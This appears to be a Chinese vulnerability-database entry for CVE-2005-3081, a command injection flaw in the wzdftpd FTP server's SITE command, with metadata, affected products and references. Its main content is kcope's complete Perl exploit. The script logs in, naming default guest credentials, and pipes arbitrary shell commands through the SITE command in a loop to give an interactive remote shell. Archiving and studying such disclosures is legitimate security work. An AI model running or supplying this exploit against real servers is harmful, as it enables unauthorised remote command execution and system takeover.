https://www.exploit-db.com/exploits/1231
https://www.securityfocus.com/bid/14935
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-251
Wzdftpd SITE Command 任意指令执行漏洞






漏洞ID | 1109090 | 漏洞类型 | 输入验证 |
发布时间 | 2005-09-24 | 更新时间 | 2006-12-15 |
![]() |
CVE-2005-3081 | ![]() |
CNNVD-200509-251 |
漏洞平台 | Linux | CVSS评分 | 4.6 |
|漏洞来源
|漏洞详情
wzdftpd是一个模块化跨平台多线程FTP服务器。wzdftpd0.5.4中存在安全漏洞,远程验证用户可以通过SITE指令中的shell元字符执行任意指令。
|漏洞EXP
######################################################
# 0day0day0day0day0day0day0day
# -------------------------------
# wzdftpd remote exploit by kcope
# nice call to popen(3) on custom
# site commands...
#
# August 2005
# confidential! keep private!
# -------------------------------
# 0day0day0day0day0day0day0day
#
# .___ _____ __ .___
#__ _ __________ __| _// ____\/ |_______ __| _/
#\ \/ \/ /\___ // __ |\ __\\ __\____ \ / __ |
# \ / / // /_/ | | | | | | |_> > /_/ |
# \/\_/ /_____ \____ | |__| |__| | __/\____ |
# \/ \/ |__| \/
#
#__ _ _______ _______ ____ ________
#\ \/ \/ /\__ \\_ __ \_/ __ \\___ /
# \ / / __ \| | \/\ ___/ / /
# \/\_/ (____ /__| \___ >_____ \
# \/ \/ \/ VER1
######################################################
use Net::FTP;
sub usage {
print "usage: wzdftpdwarez.pl remote_host remote_port user pass custom_site_command\n"
."default guest account for wzdftpd is username/password: guest/%\n";
}
print "
wzdftpd remote exploit by kcope
August 2005
confidential! keep private!
";
if ($#ARGV < 4) {
usage();
exit();
}
$host = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
$sitecmd = $ARGV[4];
$ftp = Net::FTP->new(Host => $host, Port => $port, Debug => 0)
or die "Cannot connect to $host: $@";
$ftp->login($user, $pass)
or die "Cannot login ", $ftp->message;
print "Now you can type commands, hopefully as r00t!\n";
while(1) {
print "!\$%&#>";
$cmd=<stdin>;
$ftp->site($sitecmd, "|$cmd;");
print $ftp->message();
}
# milw0rm.com [2005-09-24]
|受影响的产品
wzdftpd wzdftpd 0.5.4
wzdftpd wzdftpd 0.5.2
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1
|参考资料
来源:BID
名称:14935
链接:http://www.securityfocus.com/bid/14935
来源:MISC
链接:http://www.securiteam.com/exploits/5CP0R1PGUE.html
来源:OSVDB
名称:19682
链接:http://www.osvdb.org/19682
来源:SECUNIA
名称:16936
链接:http://secunia.com/advisories/16936
来源:FULLDISC
名称:20050924It'stimeforsomewarez-wzdftpdremoteexploit
链接:http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0646.html
来源:DEBIAN
名称:DSA-1006
链接:http://www.debian.org/security/2006/dsa-1006
检索漏洞
开始时间
结束时间